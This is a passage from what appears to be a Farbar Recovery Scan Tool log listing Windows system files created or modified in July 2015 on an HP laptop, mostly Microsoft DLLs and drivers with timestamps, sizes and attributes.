2015-07-16 10:57 - 2015-01-23 03:17 - 00723072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2015-07-16 10:57 - 2015-01-23 01:02 - 00560392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2015-07-16 10:54 - 2015-01-28 21:58 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\photowiz.dll
2015-07-16 10:54 - 2015-01-28 21:29 - 00290816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\photowiz.dll
2015-07-16 10:50 - 2015-04-30 19:05 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2015-07-16 10:50 - 2015-04-30 18:48 - 00358912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2015-07-16 10:37 - 2015-03-19 21:56 - 00080384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ahcache.sys
2015-07-16 10:36 - 2015-03-19 23:49 - 00309760 _____ (Microsoft Corporation) C:\WINDOWS\system32\compstui.dll
2015-07-16 10:36 - 2015-03-19 23:08 - 00477184 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll
2015-07-16 10:36 - 2015-03-19 22:37 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\puiobj.dll
2015-07-16 10:36 - 2015-03-19 22:07 - 01091072 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2015-07-16 10:36 - 2015-01-28 21:04 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2015-07-16 10:31 - 2015-03-03 21:32 - 00172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Input.Inking.dll
2015-07-16 10:31 - 2015-03-03 21:12 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2015-07-16 10:30 - 2015-03-01 21:43 - 00222208 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastapi.dll
2015-07-16 10:30 - 2015-03-01 21:21 - 00207872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastapi.dll
2015-07-16 10:30 - 2015-01-29 20:53 - 02819584 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers.dll
2015-07-16 10:30 - 2014-11-14 02:58 - 00116736 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsDatabase.dll
2015-07-16 10:16 - 2015-04-01 18:22 - 02985984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2015-07-16 10:16 - 2015-04-01 18:20 - 04417536 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbgeng.dll
2015-07-16 10:16 - 2015-03-31 23:45 - 01491456 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2015-07-16 10:16 - 2015-03-31 22:31 - 01207296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2015-07-16 10:16 - 2015-03-12 21:11 - 02162176 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2015-07-16 10:16 - 2015-03-12 20:39 - 01812992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2015-07-16 10:16 - 2015-02-05 16:24 - 01113920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2015-07-16 10:16 - 2015-01-29 23:01 - 00097792 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidbth.sys
2015-07-16 10:16 - 2015-01-29 22:02 - 00102912 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappgnui.dll
2015-07-16 10:16 - 2015-01-29 21:40 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappgnui.dll
2015-07-16 10:16 - 2015-01-29 21:37 - 00331776 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapp3hst.dll
2015-07-16 10:16 - 2015-01-29 21:29 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\atlthunk.dll
2015-07-16 10:16 - 2015-01-29 21:24 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapphost.dll
2015-07-16 10:16 - 2015-01-29 21:24 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapp3hst.dll
2015-07-16 10:16 - 2015-01-29 21:16 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapphost.dll
2015-07-16 10:16 - 2015-01-29 21:08 - 00346112 _____ (Microsoft Corporation) C:\WINDOWS\system32\eappcfg.dll
2015-07-16 10:16 - 2015-01-29 21:06 - 00278016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eappcfg.dll
2015-07-16 10:16 - 2014-12-11 22:04 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWbPrxy.exe
2015-07-16 10:16 - 2014-12-05 23:17 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\ncsi.dll
2015-07-16 10:16 - 2014-12-05 21:41 - 00391680 _____ (Microsoft Corporation) C:\WINDOWS\system32\nlasvc.dll
2015-07-16 10:14 - 2015-03-12 22:02 - 00316416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\udfs.sys
2015-07-16 10:14 - 2014-11-04 15:25 - 00059712 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdclass.sys
2015-07-16 10:14 - 2014-11-04 15:25 - 00051008 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mouclass.sys
2015-07-16 10:14 - 2014-11-04 02:55 - 00026112 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sermouse.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00108544 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\i8042prt.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00032256 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\kbdhid.sys
2015-07-16 10:14 - 2014-11-04 02:54 - 00030208 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mouhid.sys
2015-07-16 10:13 - 2015-04-08 18:41 - 00158720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rgb9rast.dll
2015-07-16 10:13 - 2015-04-02 20:35 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoMetadataHandler.dll
2015-07-16 10:13 - 2015-04-02 20:14 - 00364544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoMetadataHandler.dll
2015-07-16 10:10 - 2015-06-29 18:43 - 00026288 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2015-07-16 10:10 - 2015-06-29 11:07 - 01145856 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00433152 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2015-07-16 10:10 - 2015-06-29 11:07 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2015-07-16 10:10 - 2015-06-26 19:21 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2015-07-16 10:10 - 2015-06-26 19:21 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepdu.dll
2015-07-16 10:10 - 2015-05-21 09:08 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2015-07-16 10:09 - 2015-04-08 18:55 - 00410128 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2015-07-16 10:09 - 2014-12-19 02:26 - 00140800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxdav.sys
2015-07-16 10:08 - 2015-03-12 22:58 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\pku2u.dll
2015-07-16 10:08 - 2015-03-12 22:37 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pku2u.dll
2015-07-16 10:08 - 2015-01-19 14:42 - 01487976 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2015-07-16 09:54 - 2015-04-09 20:40 - 01249280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2015-07-16 09:54 - 2015-04-09 20:17 - 01018880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2015-07-16 09:44 - 2015-04-16 02:17 - 00325464 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2015-07-16 09:37 - 2015-06-10 23:49 - 01380600 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2015-07-16 09:37 - 2015-06-10 12:13 - 01097216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2015-07-16 09:37 - 2015-04-01 00:21 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2015-07-16 09:37 - 2015-04-01 00:18 - 00468480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssph.dll
2015-07-16 09:37 - 2015-04-01 00:17 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssphtb.dll
2015-07-16 09:37 - 2015-04-01 00:08 - 00774144 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssvp.dll
2015-07-16 09:37 - 2015-03-31 23:46 - 03633664 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2015-07-16 09:37 - 2015-03-31 23:17 - 02551808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2015-07-16 09:37 - 2015-03-31 23:17 - 00903168 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2015-07-16 09:37 - 2015-03-31 22:53 - 00391680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssph.dll
2015-07-16 09:37 - 2015-03-31 22:53 - 00272896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2015-07-16 09:37 - 2015-03-31 22:45 - 02749952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2015-07-16 09:37 - 2015-03-31 22:45 - 00699392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssvp.dll
2015-07-16 09:37 - 2015-03-31 22:14 - 01920000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2015-07-16 09:37 - 2015-03-31 22:12 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2015-07-16 09:37 - 2015-02-24 04:32 - 00991552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2015-07-16 09:37 - 2015-01-29 14:45 - 01763352 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2015-07-16 09:37 - 2015-01-29 14:34 - 01488040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2015-07-16 09:37 - 2014-12-11 01:36 - 00046456 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockScreenContentServer.exe
2015-07-16 09:36 - 2015-06-16 01:36 - 01661576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2015-07-16 09:36 - 2015-06-16 01:36 - 01212248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2015-07-16 09:36 - 2015-04-28 09:13 - 00513480 _____ C:\WINDOWS\SysWOW64\locale.nls
2015-07-16 09:36 - 2015-04-28 09:13 - 00513480 _____ C:\WINDOWS\system32\locale.nls
2015-07-16 09:36 - 2015-04-23 11:47 - 03084288 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2015-07-16 09:36 - 2015-04-23 11:16 - 02471424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2015-07-16 09:36 - 2015-03-05 23:08 - 02067968 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpdshext.dll
2015-07-16 09:36 - 2015-03-05 22:43 - 01969664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpdshext.dll
2015-07-16 09:36 - 2015-03-04 06:25 - 00377152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\clfs.sys
2015-07-16 09:36 - 2015-03-03 23:04 - 00075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\clfsw32.dll
2015-07-16 09:36 - 2015-03-03 22:19 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\clfsw32.dll
2015-07-16 09:36 - 2015-02-07 19:57 - 01090048 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2015-07-16 09:36 - 2015-02-07 19:49 - 00791040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MrmCoreR.dll
2015-07-16 09:36 - 2015-01-27 21:31 - 00402432 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll
2015-07-16 09:36 - 2015-01-27 21:11 - 00357376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2015-07-16 09:35 - 2015-01-27 19:47 - 02501368 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2015-07-16 09:35 - 2015-01-27 19:41 - 02207488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2015-07-16 08:42 - 2015-06-28 01:07 - 00442712 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2015-07-16 08:42 - 2015-06-28 01:07 - 00178008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2015-07-16 08:42 - 2015-06-28 01:06 - 01311960 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2015-07-16 08:42 - 2015-06-28 01:06 - 00332120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2015-07-16 08:42 - 2015-06-27 12:42 - 00747520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2015-07-16 08:42 - 2015-06-26 23:13 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2015-07-16 08:42 - 2015-06-26 23:12 - 00401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2015-07-16 08:42 - 2015-06-26 23:12 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2015-07-16 08:42 - 2015-06-26 22:40 - 00445440 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2015-07-16 08:42 - 2015-06-26 22:05 - 01441792 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2015-07-16 08:42 - 2015-06-26 22:00 - 00989184 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2015-07-16 08:42 - 2015-06-26 21:53 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2015-07-16 08:42 - 2015-06-26 21:26 - 00802816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2015-07-16 08:42 - 2015-03-30 01:47 - 00561928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2015-07-16 08:41 - 2015-05-30 17:18 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\werdiagcontroller.dll
2015-07-16 08:41 - 2015-05-30 15:36 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2015-07-16 08:41 - 2015-05-30 15:35 - 00911360 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2015-07-16 08:41 - 2015-03-08 22:02 - 00057856 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthhfenum.sys
2015-07-16 08:41 - 2014-12-19 04:57 - 00788680 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2015-07-16 08:41 - 2014-12-19 04:25 - 00602776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00535640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00531616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00448792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00413248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00372408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00108944 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDump.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00038264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2015-07-16 08:41 - 2014-12-08 15:42 - 00033584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe
2015-07-16 08:41 - 2014-10-30 18:37 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2015-07-16 08:41 - 2014-10-30 18:34 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2015-07-16 08:40 - 2015-05-02 20:39 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2015-07-16 08:38 - 2015-05-07 11:21 - 00522240 _____ (Microsoft Corporation) C:\WINDOWS\system32\GeofenceMonitorService.dll
2015-07-16 08:38 - 2015-05-07 11:05 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GeofenceMonitorService.dll
2015-07-16 08:38 - 2015-04-09 20:34 - 02256896 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2015-07-16 08:38 - 2015-04-09 20:11 - 01943040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2015-07-15 16:18 - 2015-02-20 19:49 - 00780800 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsm.dll
2015-07-15 16:16 - 2015-04-24 22:25 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usb8023.sys
2015-07-15 14:11 - 2015-03-13 00:03 - 00239424 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2015-07-15 14:11 - 2015-03-13 00:03 - 00154432 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2015-07-15 11:02 - 2015-04-30 16:35 - 00124112 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2015-07-15 11:02 - 2015-04-30 16:35 - 00102608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2015-07-13 15:36 - 2015-07-13 15:36 - 00002233 _____ C:\Users\Richie\Desktop\HP Support Assistant.lnk
2015-07-10 18:12 - 2015-07-12 01:16 - 00000000 ___DC C:\WINDOWS\Panther
2015-07-10 18:12 - 2015-07-10 18:12 - 00000000 __SHD C:\Recovery
2015-07-10 18:08 - 2015-07-10 18:08 - 00262144 _____ C:\WINDOWS\system32\config\userdiff
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files\Reference Assemblies
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files\MSBuild
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files (x86)\MSBuild
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\inetpub
2015-07-10 18:03 - 2013-08-03 00:48 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2015-07-10 18:03 - 2013-08-03 00:41 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2015-07-10 15:59 - 2015-07-20 08:44 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieBrowserModeList
2015-07-10 15:59 - 2015-07-20 08:43 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieUserList
2015-07-10 15:59 - 2015-07-20 08:43 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieSiteList
2015-07-10 15:39 - 2015-07-29 20:41 - 00000000 ___RD C:\Users\Richie\OneDrive
2015-07-10 15:30 - 2015-07-10 15:30 - 00001442 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-07-10 15:28 - 2015-07-10 15:28 - 00000020 ___SH C:\Users\Richie\ntuser.ini
2015-07-10 15:20 - 2015-07-29 20:45 - 02085733 _____ C:\WINDOWS\WindowsUpdate.log
2015-07-10 15:19 - 2015-07-10 15:19 - 00022744 _____ C:\WINDOWS\system32\emptyregdb.dat
2015-07-10 14:53 - 2015-07-10 14:53 - 00001547 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2015-07-10 14:53 - 2015-07-10 14:53 - 00000000 ____D C:\Users\Default\Documents\hp.system.package.metadata
2015-07-10 14:53 - 2015-07-10 14:53 - 00000000 ____D C:\Users\Default User\Documents\hp.system.package.metadata
2015-07-10 14:46 - 2015-07-10 14:46 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2015-07-10 14:35 - 2015-07-27 20:13 - 00000000 ____D C:\Users\Richie
2015-07-10 14:35 - 2015-07-10 14:45 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-10 14:35 - 2014-11-21 11:57 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-10 14:35 - 2014-11-21 11:57 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2015-07-10 14:35 - 2014-11-21 04:52 - 00000369 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2015-07-10 14:35 - 2014-11-21 04:52 - 00000369 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2015-07-10 14:35 - 2013-08-22 11:36 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-07-10 14:34 - 2015-07-10 15:20 - 00020958 _____ C:\WINDOWS\diagwrn.xml
2015-07-10 14:34 - 2015-07-10 15:20 - 00020958 _____ C:\WINDOWS\diagerr.xml
2015-07-10 14:21 - 2015-07-10 14:45 - 00012096 _____ C:\WINDOWS\iis.log
2015-07-10 14:21 - 2015-07-10 14:21 - 00930400 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
2015-07-10 14:16 - 2015-07-10 14:16 - 00000264 _____ C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\Program Files\Realtek
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 _____ C:\WINDOWS\ativpsrm.bin
2015-07-10 14:15 - 2015-07-10 14:15 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01009.Wdf
2015-07-10 14:15 - 2015-07-10 14:15 - 00000000 ____D C:\Program Files\Synaptics
2015-07-10 12:07 - 2015-07-10 15:20 - 00006605 _____ C:\WINDOWS\comsetup.log
2015-07-08 08:00 - 2015-07-12 01:09 - 00000000 ____D C:\WINDOWS\system32\AutoUpdateLicense
2015-07-06 09:21 - 2015-03-04 03:26 - 00011105 ____N C:\WINDOWS\system32\AutoconfigV2.cab
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-07-29 20:45 - 2013-06-06 22:42 - 00003596 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2321640021-2341620851-140482586-1002
2015-07-29 20:45 - 2013-06-06 20:08 - 00003922 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{3DBD3851-149E-4BFD-A49D-F9E67AA1E10F}
2015-07-29 20:44 - 2014-11-21 04:44 - 00956476 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-07-29 20:40 - 2013-08-22 09:25 - 00262144 ___SH C:\WINDOWS\system32\config\ELAM
2015-07-29 20:36 - 2014-11-21 04:34 - 00870466 _____ C:\WINDOWS\PFRO.log
2015-07-29 20:36 - 2013-08-22 10:46 - 00298488 _____ C:\WINDOWS\setupact.log
2015-07-29 20:36 - 2013-08-22 10:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2015-07-29 20:35 - 2013-08-22 09:25 - 01048576 ___SH C:\WINDOWS\system32\config\BBI
2015-07-29 20:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sru
2015-07-28 17:09 - 2012-07-26 03:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2015-07-28 13:20 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\vpnplugins
2015-07-28 13:17 - 2013-06-06 20:08 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Adobe
2015-07-28 12:02 - 2013-09-27 22:11 - 00000000 ____D C:\WINDOWS\system32\MRT
2015-07-27 20:17 - 2013-08-22 10:44 - 00337808 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-07-27 19:02 - 2013-04-23 03:51 - 00000000 ____D C:\ProgramData\Norton
2015-07-27 18:55 - 2012-07-26 04:12 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2015-07-25 09:24 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2015-07-25 09:18 - 2013-06-06 20:03 - 00000000 ____D C:\Users\Richie\AppData\Local\Packages
2015-07-21 16:58 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\rescache
2015-07-20 08:44 - 2015-01-29 00:30 - 00020480 ___SH C:\Users\Richie\Desktop\Thumbs.db
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ___RD C:\WINDOWS\ToastData
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\WinStore
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sr-Latn-RS
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sr-Latn-CS
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files\Windows Defender
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2015-07-20 08:00 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2015-07-18 11:03 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2015-07-18 08:25 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\AppCompat
2015-07-17 10:52 - 2014-11-21 04:25 - 00000000 ____D C:\Program Files\Windows Journal
2015-07-17 09:50 - 2013-04-23 02:57 - 00000000 ____D C:\Program Files (x86)\ATI Technologies
2015-07-17 08:53 - 2014-11-21 11:56 - 00000000 ___SD C:\WINDOWS\system32\CompatTel
2015-07-13 17:10 - 2014-11-21 12:03 - 00792568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2015-07-13 17:10 - 2014-11-21 12:03 - 00178168 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2015-07-13 15:37 - 2014-07-06 22:58 - 00000350 _____ C:\WINDOWS\Tasks\HPCeeScheduleForRichie.job
2015-07-13 15:36 - 2012-08-17 14:28 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2015-07-13 15:36 - 2012-08-17 14:28 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2015-07-13 15:34 - 2012-08-17 14:00 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2015-07-13 15:30 - 2012-08-17 14:26 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2015-07-13 15:29 - 2012-08-17 14:28 - 00000000 ____D C:\WINDOWS\System32\Tasks\Hewlett-Packard
2015-07-13 15:25 - 2012-08-03 20:02 - 00000000 ____D C:\SWSetup
2015-07-10 18:09 - 2013-08-22 11:36 - 00262144 _____ C:\WINDOWS\system32\config\BCD-Template
